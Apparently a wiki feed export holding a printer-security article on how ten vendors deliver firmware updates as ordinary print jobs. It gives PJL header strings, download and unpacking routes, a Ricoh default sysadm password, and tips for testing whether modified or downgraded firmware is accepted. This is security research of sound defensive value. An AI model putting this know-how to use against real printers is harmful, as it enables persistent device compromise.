|-&lt;br /&gt;
| prn            ||   9  || &amp;lt;span style=&amp;quot;background:#98FB98&amp;quot;&amp;gt;@PJL ENTER LANGUAGE=DOWNLOAD&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| brn            ||   7  || &amp;lt;span style=&amp;quot;background:#F0E68C&amp;quot;&amp;gt;Unknown binary, includes config file&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; | Dell&lt;br /&gt;
| fls, fly       ||  30  || &amp;lt;span style=&amp;quot;background:#87CEEB&amp;quot;&amp;gt;@PJL LPROGRAMRIP&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| prn            ||  25  || &amp;lt;span style=&amp;quot;background:#98FB98&amp;quot;&amp;gt;@PJL ENTER LANGUAGE=DOWNLOAD&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| hd             ||  18  || &amp;lt;span style=&amp;quot;background:#F4A460&amp;quot;&amp;gt;@PJL FIRMWARE=…&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| brn            ||   3  || &amp;lt;span style=&amp;quot;background:#F0E68C&amp;quot;&amp;gt;Unknown binary, includes config file&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| ps             ||   2  || PostScript (title: ''Firmware Update'')&lt;br /&gt;
|-&lt;br /&gt;
| pjl            ||   1  || @PJL ENTER LANGUAGE=FLASH&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | Brother&lt;br /&gt;
| djf            ||  79  || @PJL EXECUTE BRDOWNLOAD&lt;br /&gt;
|-&lt;br /&gt;
| blf            ||   9  || @PJL ENTER LANGUAGE=PCL&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | Lexmark&lt;br /&gt;
| fls            ||  63  || &amp;lt;span style=&amp;quot;background:#87CEEB&amp;quot;&amp;gt;@PJL LPROGRAMRIP&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| bin, fls       ||   6  || Unknown binary format&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | Samsung&lt;br /&gt;
| hd             ||  33  || &amp;lt;span style=&amp;quot;background:#F4A460&amp;quot;&amp;gt;@PJL FIRMWARE=…&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| fls, hd0       ||   4  || &amp;lt;span style=&amp;quot;background:#DDA0DD&amp;quot;&amp;gt;@PJL DEFAULT P1284VALUE=…&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;10&amp;quot; | Xerox&lt;br /&gt;
| ps             ||  36  || PostScript (title: ''Firmware Update'')&lt;br /&gt;
|-&lt;br /&gt;
| dlm            ||  35  || Xerox Dynamic Loadable Module&lt;br /&gt;
|-&lt;br /&gt;
| prn, bin       ||  20  || &amp;lt;span style=&amp;quot;background:#98FB98&amp;quot;&amp;gt;@PJL ENTER LANGUAGE=DOWNLOAD&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| hd             ||  16  || &amp;lt;span style=&amp;quot;background:#F4A460&amp;quot;&amp;gt;@PJL FIRMWARE=…&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| brn            ||  10  || &amp;lt;span style=&amp;quot;background:#F0E68C&amp;quot;&amp;gt;Unknown binary, includes config file&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| bin            ||  10  || @PJL SET JOBATTR=&amp;quot;@SWDL&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| fls, hd, hde   ||   8  || &amp;lt;span style=&amp;quot;background:#DDA0DD&amp;quot;&amp;gt;@PJL DEFAULT P1284VALUE=…&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| fls, xfc       ||   4  || @PJL ENTER LANGUAGE=XFLASH&lt;br /&gt;
|-&lt;br /&gt;
| pjl            ||   3  || @PJL FSDOWNLOAD [name].rpm&lt;br /&gt;
|-&lt;br /&gt;
| axf            ||   3  || RISC OS AIF executable&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | Ricoh&lt;br /&gt;
| brn            ||  15  || @PJL FWDOWNLOAD…&lt;br /&gt;
|-&lt;br /&gt;
| bin            ||  14  || @PJL RSYSTEMUPDATE SIZE=…&lt;br /&gt;
|-&lt;br /&gt;
| fls            ||   4  || &amp;lt;span style=&amp;quot;background:#87CEEB&amp;quot;&amp;gt;@PJL LPROGRAMRIP&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | Kyocera&lt;br /&gt;
| cramfs, img    ||  98  || cramfs image&lt;br /&gt;
|-&lt;br /&gt;
| bin, squashfs  ||  79  || squashfs image&lt;br /&gt;
|-&lt;br /&gt;
| bin, kmmfp     ||  41  || u-boot legacy uImage&lt;br /&gt;
|-&lt;br /&gt;
| efi, kmpanel   ||  13  || proprietary image format&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | Konica Minolta&lt;br /&gt;
| bin            ||  38  || unknown binary, additional checksum file&lt;br /&gt;
|-&lt;br /&gt;
| ps             ||  20  || PostScript (title: ''Softload printer modules'')&lt;br /&gt;
|-&lt;br /&gt;
| ftp, prn       ||  11  || @PJL ENTER LANGUAGE=FIRMUPDATE&lt;br /&gt;
|-&lt;br /&gt;
| upg            ||   1  || @PJL ENTER LANGUAGE=UPGRADE&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
'''How to test for this attack?'''&lt;br /&gt;
&lt;br /&gt;
The security of code signing is based on keeping the private key a long-term trade secret. There are however potentially still printers in the wild which are vulnerable to malicious firmware – either because they have not yet been updated or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It certainly must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines. Usually this requires some reverse engineering. Testing the feasibility of firmware modification attacks therefore is not trivial. In a simple test, one can '''flip a single bit''' and check if the modified firmware is still accepted by the printer device. If not, either a checksum or a digital signature is verified by the printer. Finding the difference is not always easy and writing malicious firmware (with a correct checksum) can be a time-consuming project.&lt;br /&gt;
&lt;br /&gt;
''Other attack scenarios include:''&lt;br /&gt;
&lt;br /&gt;
* Even if the firmware is signed, one may be able to downgrade to a certain (signed) firmware version, which has known security weaknesses.&lt;br /&gt;
* Even if the firmware is signed, it can sometimes be mounted to gain further information (especially Konica Minolta firmware is easily mountable).&lt;br /&gt;
* Just because firmware is signed doesn't mean it's secure. Using ''binwalk''/''grep'' etc. one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547].&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=Firmware_updates&amp;diff=318</id>
		<title>Firmware updates</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=Firmware_updates&amp;diff=318"/>
				<updated>2017-01-31T08:53:10Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: /* Ricoh */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The dangers of malicious firmware updates are well-known and have been discussed early by &amp;lt;ref&amp;gt;''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection for Open Firmware]'', F. Adelstein, M. Stillerman and D. Kozen, Computer Security Applications Conference, 2002. Proceedings. 18th Annual, IEEE, 2002, p. 403-412&amp;lt;/ref&amp;gt; and &amp;lt;ref&amp;gt;''[http://ceur-ws.org/Vol-190/paper11.pdf Phishing with Consumer Electronics: Malicious Home Routers]'', A. Tsow, MTW 190, 2006&amp;lt;/ref&amp;gt;. In contrast to other networked devices however, '''it is common for printers to deploy firmware updates as ordinary print jobs'''. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions but it seems logical that historic reasons play a role: Printers used to be connected by parallel or USB cable. Without network connectivity, security was less important and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device.&lt;br /&gt;
&lt;br /&gt;
Firmware modification attacks against network printers have been demonstrated by &amp;lt;ref name=&amp;quot;cui2011print&amp;quot;&amp;gt;''[http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware]'', A. Cui and J. Stolfo, 2011&amp;lt;/ref&amp;gt; for HP devices, by &amp;lt;ref name=&amp;quot;jordon2014wrestling&amp;quot;&amp;gt;''[https://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ Hacking Canon Pixma Printers – Doomed Encryption]'', M. Jordon, 2014&amp;lt;/ref&amp;gt; for the Canon PIXMA series and by &amp;lt;ref name=&amp;quot;heiland2011patched&amp;quot;&amp;gt;''[http://foofus.net/goons/percx/Xerox_hack.pdf From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process]'', D. Heiland, 2011&amp;lt;/ref&amp;gt; and &amp;lt;ref name=&amp;quot;weidenbach2016pwn&amp;quot;&amp;gt;''[https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PWN Xerox Printers (… again): About Hardware Attacks and (In) Secure Cloning]'', P. Weidenbach and R. Ernst, Fraunhofer FKIE, 2016&amp;lt;/ref&amp;gt; for various Xerox models. As a countermeasure, printer manufacturers started to digitally sign their firmware &amp;lt;ref name=&amp;quot;hp2012rfu&amp;quot;&amp;gt;''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03102449 Security Bulletin HPSBPI02728 SSRT100692 Rev. 6]'', HP Inc., 2012&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
== Vendors ==&lt;br /&gt;
&lt;br /&gt;
To give an overview of firmware deployment procedures 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by &amp;lt;ref&amp;gt;''Exploiting Network Printers'', J. Müller, 2016, p. 56-58&amp;lt;/ref&amp;gt;. The results are as follows.&lt;br /&gt;
&lt;br /&gt;
=== HP ===&lt;br /&gt;
&lt;br /&gt;
Firmware can be downloaded from [http://support.hp.com support.hp.com] or directly from [ftp://ftp.hp.com/pub/networking/software/pfirmware/ ftp.hp.com] via FTP. 419 files in HP's traditional remote firmware update (&amp;lt;code&amp;gt;.rfu&amp;lt;/code&amp;gt;) format and 206 newer ‘HP FutureSmart’ binaries (&amp;lt;code&amp;gt;.bdl&amp;lt;/code&amp;gt;) can be retrieved. The &amp;lt;code&amp;gt;.rfu&amp;lt;/code&amp;gt; files contain proprietary PJL commands like &amp;lt;code&amp;gt;@PJL UPGRADE SIZE=…&amp;lt;/code&amp;gt;, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by &amp;lt;ref name=&amp;quot;cui2011print&amp;quot;/&amp;gt; and caused HP to digitally sign all their printer firmware since March 2012 &amp;lt;ref name=&amp;quot;hp2012rfu&amp;quot;/&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Canon ===&lt;br /&gt;
&lt;br /&gt;
Firmware is available at [http://www.canon.com/support/ www.canon.com/support]. Canon however requires a valid device serial number to download any firmware. According to &amp;lt;ref name=&amp;quot;jordon2014wrestling&amp;quot;/&amp;gt;, who were able to modify firmware for the Canon PIXMA series, ‘there is no signing (the correct way to do it) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’.&lt;br /&gt;
&lt;br /&gt;
=== Epson ===&lt;br /&gt;
&lt;br /&gt;
Firmware can be downloaded from [http://epson.com epson.com] and via FTP from [ftp://download.epson-europe.com/ download.epson-europe.com]. Files come as WinZip self-extracting &amp;lt;code&amp;gt;.exe&amp;lt;/code&amp;gt; files and can be unpacked using ''unp''&amp;lt;ref&amp;gt;''[http://unp.bencastricum.nl/ UNP executable file restore utility]'', A. Karwath&amp;lt;/ref&amp;gt;. The contained &amp;lt;code&amp;gt;.efu&amp;lt;/code&amp;gt; files can be analyzed using ''Binwalk''&amp;lt;ref&amp;gt;''[http://binwalk.org/ Binwalk firmware analysis tool]'', C. Heffner&amp;lt;/ref&amp;gt; which extracts the actual firmware. One can obtain 49 &amp;lt;code&amp;gt;.rcx&amp;lt;/code&amp;gt; files of unknown format (‘SEIKO EPSON EpsonNet Form’) and nine &amp;lt;code&amp;gt;.prn&amp;lt;/code&amp;gt; files containing PJL commands (&amp;lt;code&amp;gt;@PJL ENTER LANGUAGE=DOWNLOAD&amp;lt;/code&amp;gt;). Epson has not released any publicly available information on protection mechanisms.&lt;br /&gt;
&lt;br /&gt;
=== Dell ===&lt;br /&gt;
&lt;br /&gt;
Firmware can be obtained from [http://downloads.dell.com downloads.dell.com] and from [ftp://ftp.us.dell.com/printer ftp.us.dell.com/printer]. Files can be unpacked using ''unp'' and the included &amp;lt;code&amp;gt;.zip&amp;lt;/code&amp;gt; files can be extracted with a variant of ''unzip''. Dell does not produce any printing devices, but rebadges the products of other vendors. Therefore a wide variety of firmware files, including 18 &amp;lt;code&amp;gt;.hd&amp;lt;/code&amp;gt; files containing &amp;lt;code&amp;gt;@PJL FIRMWARE=…&amp;lt;/code&amp;gt;, 25 &amp;lt;code&amp;gt;.prn&amp;lt;/code&amp;gt; files containing &amp;lt;code&amp;gt;@PJL ENTER LANGUAGE=DOWNLOAD&amp;lt;/code&amp;gt; and 30 &amp;lt;code&amp;gt;.fls&amp;lt;/code&amp;gt;/&amp;lt;code&amp;gt;.fly&amp;lt;/code&amp;gt; files containing &amp;lt;code&amp;gt;@PJL LPROGRAMRIP&amp;lt;/code&amp;gt; were found. Regarding protection mechanisms, Dell has not released any publicly available information.&lt;br /&gt;
&lt;br /&gt;
=== Brother ===&lt;br /&gt;
&lt;br /&gt;
Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters, one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension &amp;lt;code&amp;gt;.djf&amp;lt;/code&amp;gt; and contain &amp;lt;code&amp;gt;@PJL EXECUTE BRDOWNLOAD&amp;lt;/code&amp;gt; while nine &amp;lt;code&amp;gt;.blf&amp;lt;/code&amp;gt; files contain &amp;lt;code&amp;gt;@PJL ENTER LANGUAGE=PCL&amp;lt;/code&amp;gt;. Brother has not released any publicly available information on protection mechanisms.&lt;br /&gt;
&lt;br /&gt;
=== Lexmark ===&lt;br /&gt;
&lt;br /&gt;
Firmware is available from [http://support.lexmark.com support.lexmark.com] and can be unpacked using ''unp''. 63 &amp;lt;code&amp;gt;fls&amp;lt;/code&amp;gt; files could be obtained containing the PJL header &amp;lt;code&amp;gt;@PJL LPROGRAMRIP&amp;lt;/code&amp;gt; to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid [...] the firmware is discarded’ &amp;lt;ref&amp;gt;''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Samsung ===&lt;br /&gt;
&lt;br /&gt;
Firmware can be downloaded from [http://www.samsung.com/us/support/download www.samsung.com/us/support/download]. Retrieved files either come as zip archives or Windows executables which can be run in wine and further unpacked using ''unp''. This way, 33 &amp;lt;code&amp;gt;.hd&amp;lt;/code&amp;gt; files starting with &amp;lt;code&amp;gt;@PJL FIRMWARE&amp;lt;/code&amp;gt; and associated &amp;lt;code&amp;gt;.prn&amp;lt;/code&amp;gt; files containing &amp;lt;code&amp;gt;@PJL DEFAULT SWUPGRADE=ON&amp;lt;/code&amp;gt; could be obtained. Samsung has not released any publicly available information on protection mechanisms.&lt;br /&gt;
&lt;br /&gt;
=== Xerox ===&lt;br /&gt;
&lt;br /&gt;
Firmware is publicly available at [http://www.support.xerox.com www.support.xerox.com]. Downloaded files come in zip format and can be unpacked using ''unzip''. Firmware files are in different formats: 16 &amp;lt;code&amp;gt;.hd&amp;lt;/code&amp;gt; files including &amp;lt;code&amp;gt;@PJL FIRMWARE=…&amp;lt;/code&amp;gt;, 36 PostScript files for older devices and 35 &amp;lt;code&amp;gt;.dlm&amp;lt;/code&amp;gt; files, which is the format currently used by Xerox and includes digital signatures. A flaw in the deployment process however was found by &amp;lt;ref name=&amp;quot;heiland2011patched&amp;quot;/&amp;gt; and extended by &amp;lt;ref name=&amp;quot;weidenbach2016pwn&amp;quot;/&amp;gt;, leading to remote code execution – the private key and the tool used for code signing were contained in the firmware itself.&lt;br /&gt;
&lt;br /&gt;
=== Ricoh ===&lt;br /&gt;
&lt;br /&gt;
The ‘Firmware Download Center’ at [https://support.ricoh.com support.ricoh.com] is not open to the general public. Fortunately the interweb contains direct links to a couple of driver/firmware download pages so one is able to obtain 31 firmware files using a simple Google search (&amp;lt;code&amp;gt;site:support.ricoh.com firmware&amp;lt;/code&amp;gt;). Files can be unpacked using ''unp''. 14 &amp;lt;code&amp;gt;.bin&amp;lt;/code&amp;gt; files contain &amp;lt;code&amp;gt;@PJL RSYSTEMUPDATE SIZE=…&amp;lt;/code&amp;gt; while 15 &amp;lt;code&amp;gt;.brn&amp;lt;/code&amp;gt; files are associated with a &amp;lt;code&amp;gt;settings.ini&amp;lt;/code&amp;gt;, including &amp;lt;code&amp;gt;@PJL FWDOWNLOAD&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;USERID=sysadm, PASSWORD=sysadm&amp;lt;/code&amp;gt;. Ricoh does not provide any up-to-date information on protection mechanisms. In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ &amp;lt;ref&amp;gt;''[http://www.tsrc.ricoh-usa.com/pwhp/Network_Security_v1.7.pdf Network Security White Paper for Digital Multifunction and Printing Devices]'', Ricoh Corp., 2007, p. 10&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Kyocera ===&lt;br /&gt;
&lt;br /&gt;
Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp://ftp.kdaconnect.com ftp.kdaconnect.com]. Files can be unpacked using ''unp'' and contain mountable ''cramfs''&amp;lt;ref&amp;gt;''[http://sourceforge.net/projects/cramfs/ cramfs – A Linux filesystem designed to be simple, small, and to compress things well]'', D. Quinlan&amp;lt;/ref&amp;gt; and ''squashfs''&amp;lt;ref&amp;gt;''[http://squashfs.sourceforge.net/ squashfs – A compressed read-only filesystem for Linux]'', P. Lougher and R. Lougher&amp;lt;/ref&amp;gt; images as well as proprietary binary formats. Firmware is deployed as a print job with &amp;lt;code&amp;gt;!R! UPGR'SYS';EXIT;&amp;lt;/code&amp;gt; prepended – the ''upgrade'' command of the ''PRESCRIBE'' page description language &amp;lt;ref&amp;gt;''[http://kyoceradocumentsolutions.co.th/news/products/img_document/fs19k_rev11.pdf Kyocera Laser Printer FS-1900 Service Manual]'', Kyocera Corp., 2001, ch. 3-19&amp;lt;/ref&amp;gt;. Kyocera has not released any publicly available information on protection mechanisms.&lt;br /&gt;
&lt;br /&gt;
=== Konica ===&lt;br /&gt;
&lt;br /&gt;
Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [http://download6.konicaminolta.eu download6.konicaminolta.eu]. Newer Internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using ''unp'', ''unzip'' and ''tar'' which results in 38 proprietary &amp;lt;code&amp;gt;.bin&amp;lt;/code&amp;gt; files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like &amp;lt;code&amp;gt;@PJL ENTER LANGUAGE=FIRMUPDATE&amp;lt;/code&amp;gt;. The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ &amp;lt;ref&amp;gt;''[http://www.biz.konicaminolta.com/product_security_policy/pdf/security_white_paper_version8_0_7.pdf Konica Minolta Security White Paper]'', Konica Minolta, Inc., 2015, p. 26&amp;lt;/ref&amp;gt;. It may be doubted that such a scheme is cryptographically secure.&lt;br /&gt;
&lt;br /&gt;
== Results ==&lt;br /&gt;
&lt;br /&gt;
Out of ten analyzed manufacturers, nine use [[PJL]] commands for all or at least some of their firmware update procedures which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer – Kyocera – applies the ''PRESCRIBE'' page description language. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself and name a '''major design flaw''' present in almost any printer device: '''data and code over the same channel'''. Exploitation of this issue however, is hard as for most manufacturers no reasoned statement on protection mechanisms can be made. An in-depth analysis of firmware modification attacks should therefore be part of future research. A summary of file headers or types for all obtained firmware files is given below:&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Vendor !! Extension !! Quantity !! File header or type&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | HP&lt;br /&gt;
| rfu            || 419  || @PJL UPGRADE SIZE=…&lt;br /&gt;
|-&lt;br /&gt;
| bdl            || 206  || FutureSmart binary format&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | Epson&lt;br /&gt;
| rcx            ||  49  || SEIKO EPSON EpsonNet Form&lt;br /&gt;
|-&lt;br /&gt;
| prn            ||   9  || &amp;lt;span style=&amp;quot;background:#98FB98&amp;quot;&amp;gt;@PJL ENTER LANGUAGE=DOWNLOAD&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| brn            ||   7  || &amp;lt;span style=&amp;quot;background:#F0E68C&amp;quot;&amp;gt;Unknown binary, includes config file&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; | Dell&lt;br /&gt;
| fls, fly       ||  30  || &amp;lt;span style=&amp;quot;background:#87CEEB&amp;quot;&amp;gt;@PJL LPROGRAMRIP&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| prn            ||  25  || &amp;lt;span style=&amp;quot;background:#98FB98&amp;quot;&amp;gt;@PJL ENTER LANGUAGE=DOWNLOAD&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| hd             ||  18  || &amp;lt;span style=&amp;quot;background:#F4A460&amp;quot;&amp;gt;@PJL FIRMWARE=…&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| brn            ||   3  || &amp;lt;span style=&amp;quot;background:#F0E68C&amp;quot;&amp;gt;Unknown binary, includes config file&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| ps             ||   2  || PostScript (title: ''Firmware Update'')&lt;br /&gt;
|-&lt;br /&gt;
| pjl            ||   1  || @PJL ENTER LANGUAGE=FLASH&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | Brother&lt;br /&gt;
| djf            ||  79  || @PJL EXECUTE BRDOWNLOAD&lt;br /&gt;
|-&lt;br /&gt;
| blf            ||   9  || @PJL ENTER LANGUAGE=PCL&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | Lexmark&lt;br /&gt;
| fls            ||  63  || &amp;lt;span style=&amp;quot;background:#87CEEB&amp;quot;&amp;gt;@PJL LPROGRAMRIP&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| bin, fls       ||   6  || Unknown binary format&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | Samsung&lt;br /&gt;
| hd             ||  33  || &amp;lt;span style=&amp;quot;background:#F4A460&amp;quot;&amp;gt;@PJL FIRMWARE=…&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| fls, hd0       ||   4  || &amp;lt;span style=&amp;quot;background:#DDA0DD&amp;quot;&amp;gt;@PJL DEFAULT P1284VALUE=…&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;10&amp;quot; | Xerox&lt;br /&gt;
| ps             ||  36  || PostScript (title: ''Firmware Update'')&lt;br /&gt;
|-&lt;br /&gt;
| dlm            ||  35  || Xerox Dynamic Loadable Module&lt;br /&gt;
|-&lt;br /&gt;
| prn, bin       ||  20  || &amp;lt;span style=&amp;quot;background:#98FB98&amp;quot;&amp;gt;@PJL ENTER LANGUAGE=DOWNLOAD&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| hd             ||  16  || &amp;lt;span style=&amp;quot;background:#F4A460&amp;quot;&amp;gt;@PJL FIRMWARE=…&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| brn            ||  10  || &amp;lt;span style=&amp;quot;background:#F0E68C&amp;quot;&amp;gt;Unknown binary, includes config file&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| bin            ||  10  || @PJL SET JOBATTR=&amp;quot;@SWDL&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| fls, hd, hde   ||   8  || &amp;lt;span style=&amp;quot;background:#DDA0DD&amp;quot;&amp;gt;@PJL DEFAULT P1284VALUE=…&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| fls, xfc       ||   4  || @PJL ENTER LANGUAGE=XFLASH&lt;br /&gt;
|-&lt;br /&gt;
| pjl            ||   3  || @PJL FSDOWNLOAD [name].rpm&lt;br /&gt;
|-&lt;br /&gt;
| axf            ||   3  || RISC OS AIF executable&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | Ricoh&lt;br /&gt;
| brn            ||  15  || @PJL FWDOWNLOAD…&lt;br /&gt;
|-&lt;br /&gt;
| bin            ||  14  || @PJL RSYSTEMUPDATE SIZE=…&lt;br /&gt;
|-&lt;br /&gt;
| fls            ||   4  || &amp;lt;span style=&amp;quot;background:#87CEEB&amp;quot;&amp;gt;@PJL LPROGRAMRIP&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | Kyocera&lt;br /&gt;
| cramfs, img    ||  98  || cramfs image&lt;br /&gt;
|-&lt;br /&gt;
| bin, squashfs  ||  79  || squashfs image&lt;br /&gt;
|-&lt;br /&gt;
| bin, kmmfp     ||  41  || u-boot legacy uImage&lt;br /&gt;
|-&lt;br /&gt;
| efi, kmpanel   ||  13  || proprietary image format&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | Konica Minolta&lt;br /&gt;
| bin            ||  38  || unknown binary, additional checksum file&lt;br /&gt;
|-&lt;br /&gt;
| ps             ||  20  || PostScript (title: ''Softload printer modules'')&lt;br /&gt;
|-&lt;br /&gt;
| ftp, prn       ||  11  || @PJL ENTER LANGUAGE=FIRMUPDATE&lt;br /&gt;
|-&lt;br /&gt;
| upg            ||   1  || @PJL ENTER LANGUAGE=UPGRADE&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
'''How to test for this attack?'''&lt;br /&gt;
&lt;br /&gt;
The security of code signing is based on keeping the private key a long-term trade secret. There are however potentially still printers in the wild which are vulnerable to malicious firmware – either because they have not yet been updated or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It certainly must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines. Usually this requires some reverse engineering. Testing the feasibility of firmware modification attacks therefore is not trivial. In a simple test, one can '''flip a single bit''' and check if the modified firmware is still accepted by the printer device. If not, either a checksum or a digital signature is verified by the printer. Finding the difference is not always easy and writing malicious firmware (with a correct checksum) can be a time-consuming project.&lt;br /&gt;
&lt;br /&gt;
''Other attack scenarios include:''&lt;br /&gt;
&lt;br /&gt;
* Even if the firmware is signed, one may be able to downgrade to a certain (signed) firmware version, which has known security weaknesses.&lt;br /&gt;
* Even if the firmware is signed, it can sometimes be mounted to gain further information (especially Konica Minolta firmware is easily mountable).&lt;br /&gt;
* Just because firmware is signed doesn't mean it's secure. Using ''binwalk''/''grep'' etc. one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547].&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=Credential_disclosure&amp;diff=317</id>
		<title>Credential disclosure</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=Credential_disclosure&amp;diff=317"/>
				<updated>2017-01-31T08:51:42Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: &lt;/p&gt;
&lt;hr /&gt;
